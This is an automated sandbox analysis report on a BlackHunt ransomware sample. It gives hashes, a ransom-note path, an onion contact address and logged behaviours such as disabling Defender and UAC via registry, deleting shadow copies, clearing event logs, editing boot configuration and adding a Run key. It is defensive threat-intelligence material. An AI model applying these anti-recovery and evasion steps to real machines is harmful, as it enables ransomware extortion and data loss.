Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:29
Static task
static1
Behavioral task
behavioral1
Sample
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
Resource
win10v2004-20231215-en
General
-
Target
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
-
Size
707KB
-
MD5
4e903e9b097a09742b50c518bc787447
-
SHA1
1651074a1adfa8ae8b2d99f09de00861a2100f15
-
SHA256
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df
-
SHA512
cf7b3e0cc4318491eaa97bebf634ce190a5568f85eb283ae1e8fac38b42ef7db5620d99a3006bc8a0db5408a406169a63df9db7027f79052ab4016a0340360d3
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1w8mvnh:6uaTmkZJ+naie5OTamgEoKxLWbYh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3288 fsutil.exe 6476 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4808 wevtutil.exe 5008 wevtutil.exe 6552 wevtutil.exe 8056 wevtutil.exe 6328 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6540 bcdedit.exe 7112 bcdedit.exe 6500 bcdedit.exe 7912 bcdedit.exe -
Renames multiple (3358) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3380 wbadmin.exe 8184 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\T: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\G: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\N: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\R: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\O: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\J: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\L: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\V: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\P: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\A: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\Q: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\Y: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\W: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\M: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\I: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\S: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\H: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\Z: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\X: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\B: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\F: vds.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfont.properties.ja 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\th_get.svg 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster.jpg 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\[email protected] 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\default.jfc 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-sl\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\export.svg 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\selector.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-sl\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\ui-strings.js 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\acrobat_parcel_generic_32.svg 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5844 884 WerFault.exe 294 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 448 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4156 vssadmin.exe 4428 vssadmin.exe 2344 vssadmin.exe 6936 vssadmin.exe 7048 vssadmin.exe 5572 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2972 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4004 PING.EXE -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
